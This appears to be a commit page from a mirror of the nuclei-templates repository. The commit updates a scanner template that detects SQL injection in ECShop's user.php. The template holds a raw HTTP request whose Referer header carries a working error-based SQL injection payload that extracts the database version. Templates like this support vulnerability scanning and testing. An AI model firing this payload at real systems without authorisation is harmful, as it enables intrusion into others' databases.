daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update ecshop-sql.yaml

patch-1
ImNightmaree 2021-11-07 02:30:38 +00:00 committed by GitHub
parent f37527101c
commit 38135df2a6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
vulnerabilities/other/ecshop-sql.yaml
View File

@ -1,16 +1,15 @@
info: info:
name: Ecshop-SQL name: Ecshop-SQL
author: Lark-lab,ImNightmaree author: Lark-lab,ImNightmaree
severity: medium severity: critical
tages: sql,php,cms tages: sql,php,cms
requests: requests:
- raw: - raw:
- | - |
POST /user.php HTTP/1.1 POST /user.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
Accept-Encoding: gzip, deflate Accept-Encoding: gzip, deflate
@ -25,5 +24,4 @@ requests:
- 'XPATH' - 'XPATH'
- 'MySQL' - 'MySQL'
- 'Array' - 'Array'
condition: and condition: and